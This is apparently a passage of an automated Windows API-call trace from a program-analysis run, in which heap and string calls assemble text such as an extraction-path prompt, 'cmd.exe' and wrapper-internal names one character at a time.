[0120.249] GetLastError () returned 0x0 [0120.249] SetLastError (dwErrCode=0x0) [0120.249] wcslen (_String="Select the ex") returned 0xd [0120.249] wcslen (_String="t") returned 0x1 [0120.249] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e46b8, Size=0x26) returned 0x23e46b8 [0120.249] GetLastError () returned 0x0 [0120.250] SetLastError (dwErrCode=0x0) [0120.250] GetLastError () returned 0x0 [0120.250] SetLastError (dwErrCode=0x0) [0120.250] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e05c0, Size=0xc) returned 0x23e05c0 [0120.250] GetLastError () returned 0x0 [0120.250] SetLastError (dwErrCode=0x0) [0120.250] wcslen (_String="Select the ext") returned 0xe [0120.250] wcslen (_String="r") returned 0x1 [0120.250] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e46b8, Size=0x28) returned 0x23e46b8 [0120.250] GetLastError () returned 0x0 [0120.250] SetLastError (dwErrCode=0x0) [0120.250] GetLastError () returned 0x0 [0120.250] SetLastError (dwErrCode=0x0) [0120.250] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e05c0, Size=0xc) returned 0x23e05c0 [0120.250] GetLastError () returned 0x0 [0120.250] SetLastError (dwErrCode=0x0) [0120.250] wcslen (_String="Select the extr") returned 0xf [0120.250] wcslen (_String="a") returned 0x1 [0120.250] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e46b8, Size=0x2a) returned 0x23e46b8 [0120.250] GetLastError () returned 0x0 [0120.251] SetLastError (dwErrCode=0x0) [0120.251] GetLastError () returned 0x0 [0120.251] SetLastError (dwErrCode=0x0) [0120.251] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e05c0, Size=0xc) returned 0x23e05c0 [0120.251] GetLastError () returned 0x0 [0120.251] SetLastError (dwErrCode=0x0) [0120.251] wcslen (_String="Select the extra") returned 0x10 [0120.251] wcslen (_String="c") returned 0x1 [0120.251] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e46b8, Size=0x2c) returned 0x23e46b8 [0120.251] GetLastError () returned 0x0 [0120.251] SetLastError (dwErrCode=0x0) [0120.251] GetLastError () returned 0x0 [0120.251] SetLastError (dwErrCode=0x0) [0120.251] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e05c0, Size=0xc) returned 0x23e05c0 [0120.251] GetLastError () returned 0x0 [0120.251] SetLastError (dwErrCode=0x0) [0120.251] wcslen (_String="Select the extrac") returned 0x11 [0120.251] wcslen (_String="t") returned 0x1 [0120.251] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e46b8, Size=0x2e) returned 0x23e46b8 [0120.251] GetLastError () returned 0x0 [0120.252] SetLastError (dwErrCode=0x0) [0120.252] GetLastError () returned 0x0 [0120.252] SetLastError (dwErrCode=0x0) [0120.252] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e05c0, Size=0xc) returned 0x23e05c0 [0120.252] GetLastError () returned 0x0 [0120.252] SetLastError (dwErrCode=0x0) [0120.252] wcslen (_String="Select the extract") returned 0x12 [0120.252] wcslen (_String="i") returned 0x1 [0120.252] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e46b8, Size=0x30) returned 0x23e46b8 [0120.252] GetLastError () returned 0x0 [0120.252] SetLastError (dwErrCode=0x0) [0120.252] GetLastError () returned 0x0 [0120.252] SetLastError (dwErrCode=0x0) [0120.252] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e05c0, Size=0xc) returned 0x23e05c0 [0120.252] GetLastError () returned 0x0 [0120.252] SetLastError (dwErrCode=0x0) [0120.252] wcslen (_String="Select the extracti") returned 0x13 [0120.252] wcslen (_String="o") returned 0x1 [0120.252] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e46b8, Size=0x32) returned 0x23e46b8 [0120.252] GetLastError () returned 0x0 [0120.253] SetLastError (dwErrCode=0x0) [0120.253] GetLastError () returned 0x0 [0120.253] SetLastError (dwErrCode=0x0) [0120.253] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e05c0, Size=0xc) returned 0x23e05c0 [0120.253] GetLastError () returned 0x0 [0120.253] SetLastError (dwErrCode=0x0) [0120.253] wcslen (_String="Select the extractio") returned 0x14 [0120.253] wcslen (_String="n") returned 0x1 [0120.253] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e46b8, Size=0x34) returned 0x23e46b8 [0120.253] GetLastError () returned 0x0 [0120.253] SetLastError (dwErrCode=0x0) [0120.253] GetLastError () returned 0x0 [0120.253] SetLastError (dwErrCode=0x0) [0120.253] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e05c0, Size=0xc) returned 0x23e05c0 [0120.253] GetLastError () returned 0x0 [0120.253] SetLastError (dwErrCode=0x0) [0120.253] wcslen (_String="Select the extraction") returned 0x15 [0120.253] wcslen (_String=" ") returned 0x1 [0120.253] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e46b8, Size=0x36) returned 0x23e46b8 [0120.253] GetLastError () returned 0x0 [0120.254] SetLastError (dwErrCode=0x0) [0120.254] GetLastError () returned 0x0 [0120.254] SetLastError (dwErrCode=0x0) [0120.254] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e05c0, Size=0xc) returned 0x23e05c0 [0120.254] GetLastError () returned 0x0 [0120.254] SetLastError (dwErrCode=0x0) [0120.254] wcslen (_String="Select the extraction ") returned 0x16 [0120.254] wcslen (_String="p") returned 0x1 [0120.254] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e46b8, Size=0x38) returned 0x23e46b8 [0120.254] GetLastError () returned 0x0 [0120.254] SetLastError (dwErrCode=0x0) [0120.254] GetLastError () returned 0x0 [0120.254] SetLastError (dwErrCode=0x0) [0120.254] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e05c0, Size=0xc) returned 0x23e05c0 [0120.254] GetLastError () returned 0x0 [0120.254] SetLastError (dwErrCode=0x0) [0120.254] wcslen (_String="Select the extraction p") returned 0x17 [0120.254] wcslen (_String="a") returned 0x1 [0120.254] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e46b8, Size=0x3a) returned 0x23e46b8 [0120.254] GetLastError () returned 0x0 [0120.255] SetLastError (dwErrCode=0x0) [0120.255] GetLastError () returned 0x0 [0120.255] SetLastError (dwErrCode=0x0) [0120.255] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e05c0, Size=0xc) returned 0x23e05c0 [0120.255] GetLastError () returned 0x0 [0120.255] SetLastError (dwErrCode=0x0) [0120.255] wcslen (_String="Select the extraction pa") returned 0x18 [0120.255] wcslen (_String="t") returned 0x1 [0120.255] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e46b8, Size=0x3c) returned 0x23e46b8 [0120.255] GetLastError () returned 0x0 [0120.255] SetLastError (dwErrCode=0x0) [0120.255] GetLastError () returned 0x0 [0120.255] SetLastError (dwErrCode=0x0) [0120.255] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e05c0, Size=0xc) returned 0x23e05c0 [0120.255] GetLastError () returned 0x0 [0120.255] SetLastError (dwErrCode=0x0) [0120.255] wcslen (_String="Select the extraction pat") returned 0x19 [0120.255] wcslen (_String="h") returned 0x1 [0120.255] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e46b8, Size=0x3e) returned 0x23e46b8 [0120.255] GetLastError () returned 0x0 [0120.256] SetLastError (dwErrCode=0x0) [0120.256] GetLastError () returned 0x0 [0120.256] SetLastError (dwErrCode=0x0) [0120.256] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e05c0, Size=0xc) returned 0x23e05c0 [0120.256] GetLastError () returned 0x0 [0120.256] SetLastError (dwErrCode=0x0) [0120.256] wcslen (_String="c") returned 0x1 [0120.256] RtlAllocateHeap (HeapHandle=0x23e0000, Flags=0x0, Size=0xc) returned 0x23e4700 [0120.256] GetLastError () returned 0x0 [0120.256] SetLastError (dwErrCode=0x0) [0120.256] GetLastError () returned 0x0 [0120.256] SetLastError (dwErrCode=0x0) [0120.256] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e05c0, Size=0xc) returned 0x23e05c0 [0120.256] GetLastError () returned 0x0 [0120.256] SetLastError (dwErrCode=0x0) [0120.256] wcslen (_String="c") returned 0x1 [0120.256] wcslen (_String="m") returned 0x1 [0120.256] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e4700, Size=0xe) returned 0x23e4700 [0120.256] GetLastError () returned 0x0 [0120.256] SetLastError (dwErrCode=0x0) [0120.257] GetLastError () returned 0x0 [0120.257] SetLastError (dwErrCode=0x0) [0120.257] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e05c0, Size=0xc) returned 0x23e05c0 [0120.257] GetLastError () returned 0x0 [0120.257] SetLastError (dwErrCode=0x0) [0120.257] wcslen (_String="cm") returned 0x2 [0120.257] wcslen (_String="d") returned 0x1 [0120.257] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e4700, Size=0x10) returned 0x23e4700 [0120.257] GetLastError () returned 0x0 [0120.257] SetLastError (dwErrCode=0x0) [0120.257] GetLastError () returned 0x0 [0120.257] SetLastError (dwErrCode=0x0) [0120.257] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e05c0, Size=0xc) returned 0x23e05c0 [0120.258] GetLastError () returned 0x0 [0120.258] SetLastError (dwErrCode=0x0) [0120.258] wcslen (_String=".") returned 0x1 [0120.258] RtlAllocateHeap (HeapHandle=0x23e0000, Flags=0x0, Size=0xc) returned 0x23e4718 [0120.258] GetLastError () returned 0x0 [0120.258] SetLastError (dwErrCode=0x0) [0120.258] GetLastError () returned 0x0 [0120.258] SetLastError (dwErrCode=0x0) [0120.259] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e05c0, Size=0xc) returned 0x23e05c0 [0120.259] GetLastError () returned 0x0 [0120.259] SetLastError (dwErrCode=0x0) [0120.259] wcslen (_String=".") returned 0x1 [0120.259] wcslen (_String="e") returned 0x1 [0120.259] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e4718, Size=0xe) returned 0x23e4718 [0120.259] GetLastError () returned 0x0 [0120.259] SetLastError (dwErrCode=0x0) [0120.259] GetLastError () returned 0x0 [0120.259] SetLastError (dwErrCode=0x0) [0120.259] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e05c0, Size=0xc) returned 0x23e05c0 [0120.259] GetLastError () returned 0x0 [0120.259] SetLastError (dwErrCode=0x0) [0120.259] wcslen (_String=".e") returned 0x2 [0120.259] wcslen (_String="x") returned 0x1 [0120.259] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e4718, Size=0x10) returned 0x23e4718 [0120.259] GetLastError () returned 0x0 [0120.259] SetLastError (dwErrCode=0x0) [0120.259] GetLastError () returned 0x0 [0120.259] SetLastError (dwErrCode=0x0) [0120.259] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e05c0, Size=0xc) returned 0x23e05c0 [0120.260] GetLastError () returned 0x0 [0120.260] SetLastError (dwErrCode=0x0) [0120.260] wcslen (_String=".ex") returned 0x3 [0120.260] wcslen (_String="e") returned 0x1 [0120.260] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e4718, Size=0x12) returned 0x23e4718 [0120.260] GetLastError () returned 0x0 [0120.260] SetLastError (dwErrCode=0x0) [0120.260] GetLastError () returned 0x0 [0120.260] SetLastError (dwErrCode=0x0) [0120.260] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e05c0, Size=0xc) returned 0x23e05c0 [0120.260] GetLastError () returned 0x0 [0120.260] SetLastError (dwErrCode=0x0) [0120.260] wcslen (_String="/") returned 0x1 [0120.260] RtlAllocateHeap (HeapHandle=0x23e0000, Flags=0x0, Size=0xc) returned 0x23e4738 [0120.260] GetLastError () returned 0x0 [0120.260] SetLastError (dwErrCode=0x0) [0120.260] GetLastError () returned 0x0 [0120.260] SetLastError (dwErrCode=0x0) [0120.260] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e05c0, Size=0xc) returned 0x23e05c0 [0120.260] GetLastError () returned 0x0 [0120.261] SetLastError (dwErrCode=0x0) [0120.261] wcslen (_String="/") returned 0x1 [0120.261] wcslen (_String="c") returned 0x1 [0120.261] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e4738, Size=0xe) returned 0x23e4738 [0120.261] GetLastError () returned 0x0 [0120.261] SetLastError (dwErrCode=0x0) [0120.261] GetLastError () returned 0x0 [0120.261] SetLastError (dwErrCode=0x0) [0120.261] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e05c0, Size=0xc) returned 0x23e05c0 [0120.261] GetLastError () returned 0x0 [0120.261] SetLastError (dwErrCode=0x0) [0120.261] wcslen (_String="b") returned 0x1 [0120.261] RtlAllocateHeap (HeapHandle=0x23e0000, Flags=0x0, Size=0xc) returned 0x23e04a0 [0120.262] GetLastError () returned 0x0 [0120.262] SetLastError (dwErrCode=0x0) [0120.262] GetLastError () returned 0x0 [0120.263] SetLastError (dwErrCode=0x0) [0120.263] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e05c0, Size=0xc) returned 0x23e05c0 [0120.263] GetLastError () returned 0x0 [0120.263] SetLastError (dwErrCode=0x0) [0120.263] wcslen (_String="b") returned 0x1 [0120.263] wcslen (_String="2") returned 0x1 [0120.263] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e04a0, Size=0xe) returned 0x23e04a0 [0120.263] GetLastError () returned 0x0 [0120.263] SetLastError (dwErrCode=0x0) [0120.263] GetLastError () returned 0x0 [0120.263] SetLastError (dwErrCode=0x0) [0120.263] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e05c0, Size=0xc) returned 0x23e05c0 [0120.263] GetLastError () returned 0x0 [0120.263] SetLastError (dwErrCode=0x0) [0120.263] wcslen (_String="b2") returned 0x2 [0120.263] wcslen (_String="e") returned 0x1 [0120.263] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e04a0, Size=0x10) returned 0x23e04a0 [0120.263] GetLastError () returned 0x0 [0120.263] SetLastError (dwErrCode=0x0) [0120.263] GetLastError () returned 0x0 [0120.263] SetLastError (dwErrCode=0x0) [0120.264] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e05c0, Size=0xc) returned 0x23e05c0 [0120.264] GetLastError () returned 0x0 [0120.264] SetLastError (dwErrCode=0x0) [0120.264] wcslen (_String="b2e") returned 0x3 [0120.264] wcslen (_String="i") returned 0x1 [0120.264] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e04a0, Size=0x12) returned 0x23e04a0 [0120.264] GetLastError () returned 0x0 [0120.266] SetLastError (dwErrCode=0x0) [0120.266] GetLastError () returned 0x0 [0120.266] SetLastError (dwErrCode=0x0) [0120.266] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e05c0, Size=0xc) returned 0x23e05c0 [0120.266] GetLastError () returned 0x0 [0120.266] SetLastError (dwErrCode=0x0) [0120.266] wcslen (_String="b2ei") returned 0x4 [0120.266] wcslen (_String="n") returned 0x1 [0120.266] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e04a0, Size=0x14) returned 0x23e04a0 [0120.266] GetLastError () returned 0x0 [0120.266] SetLastError (dwErrCode=0x0) [0120.266] GetLastError () returned 0x0 [0120.267] SetLastError (dwErrCode=0x0) [0120.267] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e05c0, Size=0xc) returned 0x23e05c0 [0120.267] GetLastError () returned 0x0 [0120.267] SetLastError (dwErrCode=0x0) [0120.267] wcslen (_String="b2ein") returned 0x5 [0120.267] wcslen (_String="c") returned 0x1 [0120.267] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e04a0, Size=0x16) returned 0x23e04a0 [0120.267] GetLastError () returned 0x0 [0120.267] SetLastError (dwErrCode=0x0) [0120.267] GetLastError () returned 0x0 [0120.267] SetLastError (dwErrCode=0x0) [0120.267] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e05c0, Size=0xc) returned 0x23e05c0 [0120.267] GetLastError () returned 0x0 [0120.267] SetLastError (dwErrCode=0x0) [0120.267] wcslen (_String="b2einc") returned 0x6 [0120.267] wcslen (_String="f") returned 0x1 [0120.267] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e04a0, Size=0x18) returned 0x23e04a0 [0120.267] GetLastError () returned 0x0 [0120.267] SetLastError (dwErrCode=0x0) [0120.267] GetLastError () returned 0x0 [0120.268] SetLastError (dwErrCode=0x0) [0120.268] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e05c0, Size=0xc) returned 0x23e05c0 [0120.268] GetLastError () returned 0x0 [0120.268] SetLastError (dwErrCode=0x0) [0120.268] wcslen (_String="b2eincf") returned 0x7 [0120.268] wcslen (_String="i") returned 0x1 [0120.268] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e04a0, Size=0x1a) returned 0x23e04a0 [0120.268] GetLastError () returned 0x0 [0120.268] SetLastError (dwErrCode=0x0) [0120.268] GetLastError () returned 0x0 [0120.268] SetLastError (dwErrCode=0x0) [0120.268] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e05c0, Size=0xc) returned 0x23e05c0 [0120.268] GetLastError () returned 0x0 [0120.268] SetLastError (dwErrCode=0x0) [0120.268] wcslen (_String="b2eincfi") returned 0x8 [0120.268] wcslen (_String="l") returned 0x1 [0120.268] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e04a0, Size=0x1c) returned 0x23e04a0 [0120.268] GetLastError () returned 0x0 [0120.268] SetLastError (dwErrCode=0x0) [0120.268] GetLastError () returned 0x0 [0120.268] SetLastError (dwErrCode=0x0) [0120.268] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e05c0, Size=0xc) returned 0x23e05c0 [0120.269] GetLastError () returned 0x0 [0120.269] SetLastError (dwErrCode=0x0) [0120.269] wcslen (_String="b2eincfil") returned 0x9 [0120.269] wcslen (_String="e") returned 0x1 [0120.269] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e04a0, Size=0x1e) returned 0x23e04a0 [0120.269] GetLastError () returned 0x0 [0120.269] SetLastError (dwErrCode=0x0) [0120.269] GetLastError () returned 0x0 [0120.269] SetLastError (dwErrCode=0x0) [0120.269] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e05c0, Size=0xc) returned 0x23e05c0 [0120.269] GetLastError () returned 0x0 [0120.269] SetLastError (dwErrCode=0x0) [0120.269] wcslen (_String="b2eincfile") returned 0xa [0120.269] wcslen (_String="p") returned 0x1 [0120.269] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e04a0, Size=0x20) returned 0x23e04a0 [0120.269] GetLastError () returned 0x0 [0120.269] SetLastError (dwErrCode=0x0) [0120.269] GetLastError () returned 0x0 [0120.269] SetLastError (dwErrCode=0x0) [0120.269] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e05c0, Size=0xc) returned 0x23e05c0 [0120.269] GetLastError () returned 0x0 [0120.269] SetLastError (dwErrCode=0x0) [0120.270] wcslen (_String="b2eincfilep") returned 0xb [0120.270] wcslen (_String="a") returned 0x1 [0120.270] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e04a0, Size=0x22) returned 0x23e04a0 [0120.270] GetLastError () returned 0x0 [0120.270] SetLastError (dwErrCode=0x0) [0120.270] GetLastError () returned 0x0 [0120.270] SetLastError (dwErrCode=0x0) [0120.270] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e05c0, Size=0xc) returned 0x23e05c0 [0120.270] GetLastError () returned 0x0 [0120.270] SetLastError (dwErrCode=0x0) [0120.270] wcslen (_String="b2eincfilepa") returned 0xc [0120.270] wcslen (_String="t") returned 0x1 [0120.270] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e04a0, Size=0x24) returned 0x23e04a0 [0120.270] GetLastError () returned 0x0 [0120.270] SetLastError (dwErrCode=0x0) [0120.270] GetLastError () returned 0x0 [0120.270] SetLastError (dwErrCode=0x0) [0120.270] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e05c0, Size=0xc) returned 0x23e05c0 [0120.270] GetLastError () returned 0x0 [0120.271] SetLastError (dwErrCode=0x0) [0120.271] wcslen (_String="b2eincfilepat") returned 0xd [0120.271] wcslen (_String="h") returned 0x1 [0120.271] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e04a0, Size=0x26) returned 0x23e04a0 [0120.271] GetLastError () returned 0x0 [0120.271] SetLastError (dwErrCode=0x0) [0120.271] GetLastError () returned 0x0 [0120.271] SetLastError (dwErrCode=0x0) [0120.271] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e05c0, Size=0xc) returned 0x23e05c0 [0120.271] GetLastError () returned 0x0 [0120.271] SetLastError (dwErrCode=0x0) [0120.271] wcslen (_String="b") returned 0x1 [0120.271] RtlAllocateHeap (HeapHandle=0x23e0000, Flags=0x0, Size=0xc) returned 0x23e7858 [0120.271] GetLastError () returned 0x0 [0120.271] SetLastError (dwErrCode=0x0) [0120.271] GetLastError () returned 0x0 [0120.271] SetLastError (dwErrCode=0x0) [0120.271] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e05c0, Size=0xc) returned 0x23e05c0 [0120.271] GetLastError () returned 0x0 [0120.271] SetLastError (dwErrCode=0x0) [0120.271] wcslen (_String="b") returned 0x1 [0120.272] wcslen (_String="2") returned 0x1 [0120.272] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e7858, Size=0xe) returned 0x23e7750 [0120.272] GetLastError () returned 0x0 [0120.272] SetLastError (dwErrCode=0x0) [0120.272] GetLastError () returned 0x0 [0120.272] SetLastError (dwErrCode=0x0) [0120.272] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e05c0, Size=0xc) returned 0x23e05c0 [0120.272] GetLastError () returned 0x0 [0120.272] SetLastError (dwErrCode=0x0) [0120.272] wcslen (_String="b2") returned 0x2 [0120.272] wcslen (_String="e") returned 0x1 [0120.272] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e7750, Size=0x10) returned 0x23e76f0 [0120.272] GetLastError () returned 0x0 [0120.272] SetLastError (dwErrCode=0x0) [0120.272] GetLastError () returned 0x0 [0120.272] SetLastError (dwErrCode=0x0) [0120.272] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e05c0, Size=0xc) returned 0x23e05c0 [0120.272] GetLastError () returned 0x0 [0120.272] SetLastError (dwErrCode=0x0) [0120.272] wcslen (_String="b2e") returned 0x3 [0120.273] wcslen (_String="i") returned 0x1 [0120.273] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e76f0, Size=0x12) returned 0x23e04d0 [0120.273] GetLastError () returned 0x0 [0120.273] SetLastError (dwErrCode=0x0) [0120.273] GetLastError () returned 0x0 [0120.273] SetLastError (dwErrCode=0x0) [0120.273] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e05c0, Size=0xc) returned 0x23e05c0 [0120.273] GetLastError () returned 0x0 [0120.273] SetLastError (dwErrCode=0x0) [0120.273] wcslen (_String="b2ei") returned 0x4 [0120.273] wcslen (_String="n") returned 0x1 [0120.273] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e04d0, Size=0x14) returned 0x23e04d0 [0120.273] GetLastError () returned 0x0 [0120.273] SetLastError (dwErrCode=0x0) [0120.273] GetLastError () returned 0x0 [0120.273] SetLastError (dwErrCode=0x0) [0120.273] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e05c0, Size=0xc) returned 0x23e05c0 [0120.273] GetLastError () returned 0x0 [0120.273] SetLastError (dwErrCode=0x0) [0120.273] wcslen (_String="b2ein") returned 0x5 [0120.274] wcslen (_String="c") returned 0x1 [0120.274] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e04d0, Size=0x16) returned 0x23e04d0 [0120.274] GetLastError () returned 0x0 [0120.274] SetLastError (dwErrCode=0x0) [0120.274] GetLastError () returned 0x0 [0120.274] SetLastError (dwErrCode=0x0) [0120.274] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e05c0, Size=0xc) returned 0x23e05c0 [0120.274] GetLastError () returned 0x0 [0120.274] SetLastError (dwErrCode=0x0) [0120.274] wcslen (_String="b2einc") returned 0x6 [0120.274] wcslen (_String="f") returned 0x1 [0120.274] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e04d0, Size=0x18) returned 0x23e04d0 [0120.274] GetLastError () returned 0x0 [0120.274] SetLastError (dwErrCode=0x0) [0120.274] GetLastError () returned 0x0 [0120.274] SetLastError (dwErrCode=0x0) [0120.274] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e05c0, Size=0xc) returned 0x23e05c0 [0120.274] GetLastError () returned 0x0 [0120.274] SetLastError (dwErrCode=0x0) [0120.274] wcslen (_String="b2eincf") returned 0x7 [0120.274] wcslen (_String="i") returned 0x1 [0120.275] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e04d0, Size=0x1a) returned 0x23e04d0 [0120.275] GetLastError () returned 0x0 [0120.275] SetLastError (dwErrCode=0x0) [0120.275] GetLastError () returned 0x0 [0120.275] SetLastError (dwErrCode=0x0) [0120.275] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e05c0, Size=0xc) returned 0x23e05c0 [0120.275] GetLastError () returned 0x0 [0120.275] SetLastError (dwErrCode=0x0) [0120.275] wcslen (_String="b2eincfi") returned 0x8 [0120.275] wcslen (_String="l") returned 0x1 [0120.275] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e04d0, Size=0x1c) returned 0x23e04d0 [0120.275] GetLastError () returned 0x0 [0120.275] SetLastError (dwErrCode=0x0) [0120.275] GetLastError () returned 0x0 [0120.275] SetLastError (dwErrCode=0x0) [0120.275] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e05c0, Size=0xc) returned 0x23e05c0 [0120.275] GetLastError () returned 0x0 [0120.275] SetLastError (dwErrCode=0x0) [0120.275] wcslen (_String="b2eincfil") returned 0x9 [0120.275] wcslen (_String="e") returned 0x1 [0120.275] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e04d0, Size=0x1e) returned 0x23e04d0 [0120.275] GetLastError () returned 0x0 [0120.276] SetLastError (dwErrCode=0x0) [0120.276] GetLastError () returned 0x0 [0120.276] SetLastError (dwErrCode=0x0) [0120.276] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e05c0, Size=0xc) returned 0x23e05c0 [0120.276] GetLastError () returned 0x0 [0120.276] SetLastError (dwErrCode=0x0) [0120.276] wcslen (_String="b2eincfile") returned 0xa [0120.276] wcslen (_String="c") returned 0x1 [0120.276] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e04d0, Size=0x20) returned 0x23e04d0 [0120.276] GetLastError () returned 0x0 [0120.276] SetLastError (dwErrCode=0x0) [0120.276] GetLastError () returned 0x0 [0120.276] SetLastError (dwErrCode=0x0) [0120.276] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e05c0, Size=0xc) returned 0x23e05c0 [0120.276] GetLastError () returned 0x0 [0120.276] SetLastError (dwErrCode=0x0) [0120.276] wcslen (_String="b2eincfilec") returned 0xb [0120.276] wcslen (_String="o") returned 0x1 [0120.276] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e04d0, Size=0x22) returned 0x23e04d0 [0120.276] GetLastError () returned 0x0 [0120.276] SetLastError (dwErrCode=0x0) [0120.277] GetLastError () returned 0x0 [0120.277] SetLastError (dwErrCode=0x0) [0120.277] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e05c0, Size=0xc) returned 0x23e05c0 [0120.277] GetLastError () returned 0x0 [0120.277] SetLastError (dwErrCode=0x0) [0120.277] wcslen (_String="b2eincfileco") returned 0xc [0120.277] wcslen (_String="u") returned 0x1 [0120.277] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e04d0, Size=0x24) returned 0x23e04d0 [0120.277] GetLastError () returned 0x0 [0120.277] SetLastError (dwErrCode=0x0) [0120.277] GetLastError () returned 0x0 [0120.277] SetLastError 